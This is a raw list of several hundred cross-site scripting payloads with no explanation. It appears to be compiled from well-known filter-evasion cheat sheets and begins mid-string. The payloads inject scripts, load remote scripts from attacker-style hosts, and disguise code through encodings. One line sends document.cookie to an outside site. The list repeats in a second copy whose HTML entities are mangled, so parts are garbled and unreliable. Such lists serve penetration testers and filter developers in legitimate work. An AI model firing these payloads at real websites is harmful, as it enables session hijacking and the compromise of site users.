\u0051\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0043\u0039\u006e\u0050\u0069\u0041\u0067\u0043\u006a\u0077\u0076\u0063\u0033\u005a\u006e\u0050\u0069\u0041\u0067\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');"></img>
</body>
</html>
<SCRIPT SRC=http://hacker-site.com/xss.js></SCRIPT>
<SCRIPT> alert(“XSS”); </SCRIPT>
<BODY ONLOAD=alert("XSS")>
<BODY BACKGROUND="javascript:alert('XSS')">
<IMG SRC="javascript:alert('XSS');">
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<IFRAME SRC=”http://hacker-site.com/xss.html”>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<OBJECT TYPE="text/x-scriptlet" DATA="http://hacker.com/xss.html">
<EMBED SRC="http://hacker.com/xss.swf" AllowScriptAccess="always">
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
<SCRIPT>alert('XSS')</SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<BASE HREF="javascript:alert('XSS');//">
<BGSOUND SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS');">
<BODY ONLOAD=alert('XSS')>
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG DYNSRC="javascript:alert('XSS');">
<IMG LOWSRC="javascript:alert('XSS');">
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode%22>
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
exp/*<XSS STYLE='no\xss:noxss("*//*");
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
<IMG SRC='vbscript:msgbox("XSS")'>
<LAYER SRC="http://ha.ckers.org/scriptlet.html%22></LAYER>
<IMG SRC="livescript:[code]">
%BCscript%BEalert(%A2XSS%A2)%BC/script%BE
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');%22>
<IMG SRC="mocha:[code]">
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html%22></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
<EMBED SRC="http://ha.ckers.org/xss.swf%22 AllowScriptAccess="always"></EMBED>
a="get"; b="URL(""; c="javascript:"; d="alert('XSS');")";
eval(a+b+c+d);
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
<XSS STYLE="xss:expression(alert('XSS'))">
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css%22>
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss%22)}</STYLE>
<TABLE BACKGROUND="javascript:alert('XSS')"></TABLE>
<TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE>
<HTML xmlns:xss>
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
<XML SRC="http://ha.ckers.org/xsstest.xml%22 ID=I></XML>
<HTML><BODY>
<!--[if gte IE 4]>
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
<XSS STYLE="behavior: url(http://ha.ckers.org/xss.htc);%22>
<SCRIPT SRC="http://ha.ckers.org/xss.jpg%22></SCRIPT>
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"-->
<? echo('<SCR)';
<BR SIZE="&{alert('XSS')}">
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<IMG SRC=javascript:alert('XSS')>
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
\";alert('XSS');//
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<IMG
SRC
=
"
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
'
X
S
S
'
)
"
>
perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";'> out
perl -e 'print "&<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out
<IMG SRC="  javascript:alert('XSS');">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js%22></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<SCRIPT SRC=http://ha.ckers.org/xss.js
<SCRIPT SRC=//ha.ckers.org/.j>
<IMG SRC="javascript:alert('XSS')"
<IFRAME SRC=http://ha.ckers.org/scriptlet.html <
<<SCRIPT>alert("XSS");//<</SCRIPT>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<SCRIPT>a=/XSS/
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js%22></SCRIPT>
<SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js%22></SCRIPT>
<SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js%22></SCRIPT>
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js%22></SCRIPT>
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js%22></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js%22></SCRIPT>
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js%22></SCRIPT>
<A HREF="http://66.102.7.147/%22>XSS</A>
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D%22>XSS</A>
<A HREF="http://1113982867/%22>XSS</A>
<A HREF="http://0x42.0x0000066.0x7.0x93/%22>XSS</A>
<A HREF="http://0102.0146.0007.00000223/%22>XSS</A>
<A HREF="h
tt p://6	6.000146.0x7.147/">XSS</A>
<A HREF="//www.google.com/">XSS</A>
<A HREF="//google">XSS</A>
<A HREF="http://ha.ckers.org@google%22>XSS</A>
<A HREF="http://google:ha.ckers.org%22>XSS</A>
<A HREF="http://google.com/%22>XSS</A>
<A HREF="http://www.google.com./%22>XSS</A>
<A HREF="javascript:document.location='http://www.google.com/'%22>XSS</A>
<A HREF="http://www.gohttp://www.google.com/ogle.com/%22>XSS</A>
<script>document.vulnerable=true;</script>
<img SRC="jav ascript:document.vulnerable=true;">
<img SRC="javascript:document.vulnerable=true;">
<img SRC="  javascript:document.vulnerable=true;">
<body onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;>
<<SCRIPT>document.vulnerable=true;//<</SCRIPT>
<script document.vulnerable=true;</script>
<img SRC="javascript:document.vulnerable=true;"
<iframe src="javascript:document.vulnerable=true; <
<script>a=/XSS/\ndocument.vulnerable=true;</script>
\";document.vulnerable=true;;//
</title><SCRIPT>document.vulnerable=true;</script>
<input TYPE="IMAGE" SRC="javascript:document.vulnerable=true;">
<body BACKGROUND="javascript:document.vulnerable=true;">
<body ONLOAD=document.vulnerable=true;>
<img DYNSRC="javascript:document.vulnerable=true;">
<img LOWSRC="javascript:document.vulnerable=true;">
<bgsound SRC="javascript:document.vulnerable=true;">
<LAYER SRC="javascript:document.vulnerable=true;"></LAYER>
<link REL="stylesheet" HREF="javascript:document.vulnerable=true;">
<style>li {list-style-image: url("javascript:document.vulnerable=true;");</STYLE>- XSS
<img SRC='vbscript:document.vulnerable=true;'>
1script3document.vulnerable=true;1/script3
<meta HTTP-EQUIV="refresh" CONTENT="0;url=javascript:document.vulnerable=true;">
<meta HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:document.vulnerable=true;">
<IFRAME SRC="javascript:document.vulnerable=true;"></iframe>
<FRAMESET><FRAME SRC="javascript:document.vulnerable=true;"></frameset>
<style>@im\port'\ja\vasc\ript:document.vulnerable=true';</style>
<img STYLE="xss:expr/*XSS*/ession(document.vulnerable=true)">
<XSS STYLE="xss:expression(document.vulnerable=true)">
exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'>
<style TYPE="text/javascript">document.vulnerable=true;</style>
<style>.XSS{background-image:url("javascript:document.vulnerable=true");}</STYLE><A CLASS=XSS></a>
<style type="text/css">BODY{background:url("javascript:document.vulnerable=true")}</style>
<base HREF="javascript:document.vulnerable=true;//">
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.vulnerable=true></object>
<XML ID=I><X><C><![<IMG SRC="javas]]<![cript:document.vulnerable=true;">]]</C></X></xml>
<XML ID="xss"><IMG SRC="javascript:document.vulnerable=true"></XML>
<html><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>"></BODY></html>
<? echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?>
<meta HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.vulnerable=true</SCRIPT>">
<head><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4-
<a href="javascript#document.vulnerable=true;">
<img src="javascript:document.vulnerable=true;">
<img dynsrc="javascript:document.vulnerable=true;">
<input type="image" dynsrc="javascript:document.vulnerable=true;">
<bgsound src="javascript:document.vulnerable=true;">
&<script>document.vulnerable=true;</script>
&{document.vulnerable=true;};
<img src=&{document.vulnerable=true;};>
<link rel="stylesheet" href="javascript:document.vulnerable=true;">
<iframe src="vbscript:document.vulnerable=true;">
<img src="mocha:document.vulnerable=true;">
<img src="livescript:document.vulnerable=true;">
<a href="about:<script>document.vulnerable=true;</script>">
<meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;">
<body onload="document.vulnerable=true;">
<style type="text/javascript">document.vulnerable=true;</style>
<object classid="clsid:..." codebase="javascript:document.vulnerable=true;">
<style></script>
<<script>document.vulnerable=true;</script>
<![</script>
<script>document.vulnerable=true;</script>
<img src="blah"onmouseover="document.vulnerable=true;">
<img src="blah>" onmouseover="document.vulnerable=true;">
<xml src="javascript:document.vulnerable=true;">
<xml id="X"><a><script>document.vulnerable=true;</script>;</a></xml>
[\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script>
<style>@import'http://www.securitycompass.com/xss.css';</style>
<meta HTTP-EQUIV="Link" Content="<http://www.securitycompass.com/xss.css>; REL=stylesheet">
<style>BODY{-moz-binding:url("http://www.securitycompass.com/xssmoz.xml#xss")}</style>
<OBJECT TYPE="text/x-scriptlet" DATA="http://www.securitycompass.com/scriptlet.html"></object>
<HTML xmlns:xss><?import namespace="xss" implementation="http://www.securitycompass.com/xss.htc"><xss:xss>XSS</xss:xss></html>
<script SRC="http://www.securitycompass.com/xss.jpg"></script>
<script a=">" SRC="http://www.securitycompass.com/xss.js"></script>
<script =">" SRC="http://www.securitycompass.com/xss.js"></script>
<script a=">" SRC="http://www.securitycompass.com/xss.js"></script>
<script "a='>'" SRC="http://www.securitycompass.com/xss.js"></script>
<script a=`>` SRC="http://www.securitycompass.com/xss.js"></script>
<script a=">'>" SRC="http://www.securitycompass.com/xss.js"></script>
<script>document.write("<SCRI");</SCRIPT>PT SRC="http://www.securitycompass.com/xss.js"></script>
[Mozilla]
"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
</script><script>alert(1)</script>
</br style=a:expression(alert())>
<scrscriptipt>alert(1)</scrscriptipt>
<br size=\"&{alert('XSS')}\">
perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out
perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
<~/XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/?sid="%2bdocument.cookie)>
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
<~/XSS STYLE=xss:expression(alert('XSS'))>
"><script>alert('XSS')</script>
</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
XSS STYLE=xss:e/**/xpression(alert('XSS'))>
</XSS STYLE=xss:expression(alert('XSS'))>
';;alert(String.fromCharCode(88,83,83))//\';;alert(String.fromCharCode(88,83,83))//";;alert(String.fromCharCode(88,83,83))//\";;alert(String.fromCharCode(88,83,83))//-->;<;/SCRIPT>;";>;';>;<;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>;
';';;!--";<;XSS>;=&;{()}
<;SCRIPT>;alert(';XSS';)<;/SCRIPT>;
<;SCRIPT SRC=http://ha.ckers.org/xss.js>;<;/SCRIPT>;
<;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>;
<;BASE HREF=";javascript:alert(';XSS';);//";>;
<;BGSOUND SRC=";javascript:alert(';XSS';);";>;
<;BODY BACKGROUND=";javascript:alert(';XSS';);";>;
<;BODY ONLOAD=alert(';XSS';)>;
<;DIV STYLE=";background-image: url(javascript:alert(';XSS';))";>;
<;DIV STYLE=";background-image: url(&;#1;javascript:alert(';XSS';))";>;
<;DIV STYLE=";width: expression(alert(';XSS';));";>;
<;FRAMESET>;<;FRAME SRC=";javascript:alert(';XSS';);";>;<;/FRAMESET>;
<;IFRAME SRC=";javascript:alert(';XSS';);";>;<;/IFRAME>;
<;INPUT TYPE=";IMAGE"; SRC=";javascript:alert(';XSS';);";>;
<;IMG SRC=";javascript:alert(';XSS';);";>;
<;IMG SRC=javascript:alert(';XSS';)>;
<;IMG DYNSRC=";javascript:alert(';XSS';);";>;
<;IMG LOWSRC=";javascript:alert(';XSS';);";>;
<;IMG SRC=";http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode";>;
Redirect 302 /a.jpg http://victimsite.com/admin.asp&;deleteuser
exp/*<;XSS STYLE=';no\xss:noxss(";*//*";);
<;STYLE>;li {list-style-image: url(";javascript:alert('XSS')";);}<;/STYLE>;<;UL>;<;LI>;XSS
<;IMG SRC=';vbscript:msgbox(";XSS";)';>;
<;LAYER SRC=";http://ha.ckers.org/scriptlet.html";>;<;/LAYER>;
<;IMG SRC=";livescript:[code]";>;
%BCscript%BEalert(%A2XSS%A2)%BC/script%BE
<;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=javascript:alert(';XSS';);";>;
<;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K";>;
<;META HTTP-EQUIV=";refresh"; CONTENT=";0; URL=http://;URL=javascript:alert(';XSS';);";>;
<;IMG SRC=";mocha:[code]";>;
<;OBJECT TYPE=";text/x-scriptlet"; DATA=";http://ha.ckers.org/scriptlet.html";>;<;/OBJECT>;
<;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389>;<;param name=url value=javascript:alert(';XSS';)>;<;/OBJECT>;
<;EMBED SRC=";http://ha.ckers.org/xss.swf"; AllowScriptAccess=";always";>;<;/EMBED>;
a=";get";;&;#10;b=";URL(";";;&;#10;c=";javascript:";;&;#10;d=";alert(';XSS';);";)";;
eval(a+b+c+d);
<;STYLE TYPE=";text/javascript";>;alert(';XSS';);<;/STYLE>;
<;IMG STYLE=";xss:expr/*XSS*/ession(alert(';XSS';))";>;
<;XSS STYLE=";xss:expression(alert(';XSS';))";>;
<;STYLE>;.XSS{background-image:url(";javascript:alert(';XSS';)";);}<;/STYLE>;<;A CLASS=XSS>;<;/A>;
<;STYLE type=";text/css";>;BODY{background:url(";javascript:alert(';XSS';)";)}<;/STYLE>;
<;LINK REL=";stylesheet"; HREF=";javascript:alert(';XSS';);";>;
<;LINK REL=";stylesheet"; HREF=";http://ha.ckers.org/xss.css";>;
<;STYLE>;@import';http://ha.ckers.org/xss.css';;<;/STYLE>;
<;META HTTP-EQUIV=";Link"; Content=";<;http://ha.ckers.org/xss.css>;; REL=stylesheet";>;
<;STYLE>;BODY{-moz-binding:url(";http://ha.ckers.org/xssmoz.xml#xss";)}<;/STYLE>;
<;TABLE BACKGROUND=";javascript:alert(';XSS';)";>;<;/TABLE>;
<;TABLE>;<;TD BACKGROUND=";javascript:alert(';XSS';)";>;<;/TD>;<;/TABLE>;
<;HTML xmlns:xss>;
<;XML ID=I>;<;X>;<;C>;<;![CDATA[<;IMG SRC=";javas]]>;<;![CDATA[cript:alert(';XSS';);";>;]]>;
<;XML ID=";xss";>;<;I>;<;B>;<;IMG SRC=";javas<;!-- -->;cript:alert(';XSS';)";>;<;/B>;<;/I>;<;/XML>;
<;XML SRC=";http://ha.ckers.org/xsstest.xml"; ID=I>;<;/XML>;
<;HTML>;<;BODY>;
<;!--[if gte IE 4]>;
<;META HTTP-EQUIV=";Set-Cookie"; Content=";USERID=<;SCRIPT>;alert(';XSS';)<;/SCRIPT>;";>;
<;XSS STYLE=";behavior: url(http://ha.ckers.org/xss.htc);";>;
<;SCRIPT SRC=";http://ha.ckers.org/xss.jpg";>;<;/SCRIPT>;
<;!--#exec cmd=";/bin/echo ';<;SCRIPT SRC';";-->;<;!--#exec cmd=";/bin/echo ';=http://ha.ckers.org/xss.js>;<;/SCRIPT>;';";-->;
<;? echo(';<;SCR)';;
<;BR SIZE=";&;{alert(';XSS';)}";>;
<;IMG SRC=JaVaScRiPt:alert(';XSS';)>;
<;IMG SRC=javascript:alert(&;quot;XSS&;quot;)>;
<;IMG SRC=`javascript:alert(";RSnake says, ';XSS';";)`>;
<;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>;
<;IMG RC=&;#106;&;#97;&;#118;&;#97;&;#115;&;#99;&;#114;&;#105;&;#112;&;#116;&;#58;&;#97;&;#108;&;#101;&;#114;&;#116;&;#40;&;#39;&;#88;&;#83;&;#83;&;#39;&;#41;>;
<;IMG RC=&;#0000106&;#0000097&;#0000118&;#0000097&;#0000115&;#0000099&;#0000114&;#0000105&;#0000112&;#0000116&;#0000058&;#0000097&;#0000108&;#0000101&;#0000114&;#0000116&;#0000040&;#0000039&;#0000088&;#0000083&;#0000083&;#0000039&;#0000041>;
<;DIV STYLE=";background-image:\0075\0072\006C\0028';\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.10530053\0027\0029';\0029";>;
<;IMG SRC=&;#x6A&;#x61&;#x76&;#x61&;#x73&;#x63&;#x72&;#x69&;#x70&;#x74&;#x3A&;#x61&;#x6C&;#x65&;#x72&;#x74&;#x28&;#x27&;#x58&;#x53&;#x53&;#x27&;#x29>;
<;HEAD>;<;META HTTP-EQUIV=";CONTENT-TYPE"; CONTENT=";text/html; charset=UTF-7";>; <;/HEAD>;+ADw-SCRIPT+AD4-alert(';XSS';);+ADw-/SCRIPT+AD4-
\";;alert(';XSS';);//
<;/TITLE>;<;SCRIPT>;alert("XSS");<;/SCRIPT>;
<;STYLE>;@im\port';\ja\vasc\ript:alert(";XSS";)';;<;/STYLE>;
<;IMG SRC=";jav ascript:alert(';XSS';);";>;
<;IMG SRC=";jav&;#x09;ascript:alert(';XSS';);";>;
<;IMG SRC=";jav&;#x0A;ascript:alert(';XSS';);";>;
<;IMG SRC=";jav&;#x0D;ascript:alert(';XSS';);";>;
<;IMG
SRC
=
";
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t

';
X
S
S
';
)
";
>;
perl -e ';print ";<;IM SRC=java\0script:alert(";XSS";)>";;';>; out
perl -e ';print ";&;<;SCR\0IPT>;alert(";XSS";)<;/SCR\0IPT>;";;'; >; out
<;IMG SRC="; &;#14; javascript:alert(';XSS';);";>;
<;SCRIPT/XSS SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
<;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(";XSS";)>;
<;SCRIPT SRC=http://ha.ckers.org/xss.js
<;SCRIPT SRC=//ha.ckers.org/.j>;
<;IMG SRC=";javascript:alert(';XSS';)";
<;IFRAME SRC=http://ha.ckers.org/scriptlet.html <;
<;<;SCRIPT>;alert(";XSS";);//<;<;/SCRIPT>;
<;IMG ";";";>;<;SCRIPT>;alert(";XSS";)<;/SCRIPT>;";>;
<;SCRIPT>;a=/XSS/
<;SCRIPT a=";>;"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
<;SCRIPT =";blah"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
<;SCRIPT a=";blah"; ';'; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
<;SCRIPT ";a=';>;';"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
<;SCRIPT a=`>;` SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
<;SCRIPT>;document.write(";<;SCRI";);<;/SCRIPT>;PT SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
<;SCRIPT a=";>';>"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
<;A HREF=";http://66.102.7.147/";>;XSS<;/A>;
<;A HREF=";http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D";>;XSS<;/A>;
<;A HREF=";http://1113982867/";>;XSS<;/A>;
<;A HREF=";http://0x42.0x0000066.0x7.0x93/";>;XSS<;/A>;
<;A HREF=";http://0102.0146.0007.00000223/";>;XSS<;/A>;
<;A HREF=";h
tt p://6&;#09;6.000146.0x7.147/";>;XSS<;/A>;
<;A HREF=";//www.google.com/";>;XSS<;/A>;
<;A HREF=";//google";>;XSS<;/A>;
<;A HREF=";http://ha.ckers.org@google";>;XSS<;/A>;
<;A HREF=";http://google:ha.ckers.org";>;XSS<;/A>;
<;A HREF=";http://google.com/";>;XSS<;/A>;
<;A HREF=";http://www.google.com./";>;XSS<;/A>;
<;A HREF=";javascript:document.location=';http://www.google.com/';";>;XSS<;/A>;
<;A HREF=";http://www.gohttp://www.google.com/ogle.com/";>;XSS<;/A>;
<script>document.vulnerable=true;</script>
<img SRC="jav ascript:document.vulnerable=true;">
<img SRC="javascript:document.vulnerable=true;">
<img SRC="  javascript:document.vulnerable=true;">
<body onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;>
<<SCRIPT>document.vulnerable=true;//<</SCRIPT>
<script document.vulnerable=true;</script>
<img SRC="javascript:document.vulnerable=true;"
<iframe src="javascript:document.vulnerable=true; <
<script>a=/XSS/\ndocument.vulnerable=true;</script>
\";document.vulnerable=true;;//
</title><SCRIPT>document.vulnerable=true;</script>
<input TYPE="IMAGE" SRC="javascript:document.vulnerable=true;">
<body BACKGROUND="javascript:document.vulnerable=true;">
<body ONLOAD=document.vulnerable=true;>
<img DYNSRC="javascript:document.vulnerable=true;">
<img LOWSRC="javascript:document.vulnerable=true;">
<bgsound SRC="javascript:document.vulnerable=true;">
<LAYER SRC="javascript:document.vulnerable=true;"></LAYER>
<link REL="stylesheet" HREF="javascript:document.vulnerable=true;">
<style>li {list-style-image: url("javascript:document.vulnerable=true;");</STYLE>- XSS
<img SRC='vbscript:document.vulnerable=true;'>
1script3document.vulnerable=true;1/script3
<meta HTTP-EQUIV="refresh" CONTENT="0;url=javascript:document.vulnerable=true;">
<meta HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:document.vulnerable=true;">
<IFRAME SRC="javascript:document.vulnerable=true;"></iframe>
<FRAMESET><FRAME SRC="javascript:document.vulnerable=true;"></frameset>
<style>@im\port'\ja\vasc\ript:document.vulnerable=true';</style>
<img STYLE="xss:expr/*XSS*/ession(document.vulnerable=true)">
<XSS STYLE="xss:expression(document.vulnerable=true)">
exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'>
<style TYPE="text/javascript">document.vulnerable=true;</style>
<style>.XSS{background-image:url("javascript:document.vulnerable=true");}</STYLE><A CLASS=XSS></a>
<style type="text/css">BODY{background:url("javascript:document.vulnerable=true")}</style>
<base HREF="javascript:document.vulnerable=true;//">
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.vulnerable=true></object>
<XML ID=I><X><C><![<IMG SRC="javas]]<![cript:document.vulnerable=true;">]]</C></X></xml>
<XML ID="xss"><IMG SRC="javascript:document.vulnerable=true"></XML>
<html><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>"></BODY></html>
<? echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?>
<meta HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.vulnerable=true</SCRIPT>">
<head><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4-
<a href="javascript#document.vulnerable=true;">
<img src="javascript:document.vulnerable=true;">
<img dynsrc="javascript:document.vulnerable=true;">
<input type="image" dynsrc="javascript:document.vulnerable=true;">
<bgsound src="javascript:document.vulnerable=true;">
&<script>document.vulnerable=true;</script>
&{document.vulnerable=true;};
<img src=&{document.vulnerable=true;};>
<link rel="stylesheet" href="javascript:document.vulnerable=true;">
<iframe src="vbscript:document.vulnerable=true;">
<img src="mocha:document.vulnerable=true;">
<img src="livescript:document.vulnerable=true;">
<a href="about:<script>document.vulnerable=true;</script>">
<meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;">
<body onload="document.vulnerable=true;">
<style type="text/javascript">document.vulnerable=true;</style>
<object classid="clsid:..." codebase="javascript:document.vulnerable=true;">
<style></script>
<<script>document.vulnerable=true;</script>
<![</script>
<script>document.vulnerable=true;</script>
<img src="blah"onmouseover="document.vulnerable=true;">
<img src="blah>" onmouseover="document.vulnerable=true;">
<xml src="javascript:document.vulnerable=true;">
<xml id="X"><a><script>document.vulnerable=true;</script>;</a></xml>
[\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script>
<style>@import'http://www.securitycompass.com/xss.css';</style>
<meta HTTP-EQUIV="Link" Content="<http://www.securitycompass.com/xss.css>; REL=stylesheet">
<style>BODY{-moz-binding:url("http://www.securitycompass.com/xssmoz.xml#xss")}</style>
<OBJECT TYPE="text/x-scriptlet" DATA="http://www.securitycompass.com/scriptlet.html"></object>
<HTML xmlns:xss><?import namespace="xss" implementation="http://www.securitycompass.com/xss.htc"><xss:xss>XSS</xss:xss></html>
<script SRC="http://www.securitycompass.com/xss.jpg"></script>
<script a=">" SRC="http://www.securitycompass.com/xss.js"></script>
<script =">" SRC="http://www.securitycompass.com/xss.js"></script>
<script a=">" SRC="http://www.securitycompass.com/xss.js"></script>
<script "a='>'" SRC="http://www.securitycompass.com/xss.js"></script>
<script a=`>` SRC="http://www.securitycompass.com/xss.js"></script>
<script a=">'>" SRC="http://www.securitycompass.com/xss.js"></script>
<script>document.write("<SCRI");</SCRIPT>PT SRC="http://www.securitycompass.com/xss.js"></script>
[Mozilla]
";>;<;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(";XSS";)>;
<;/script>;<;script>;alert(1)<;/script>;
<;/br style=a:expression(alert())>;
<;scrscriptipt>;alert(1)<;/scrscriptipt>;
<;br size=\";&;{alert('XSS')}\";>;
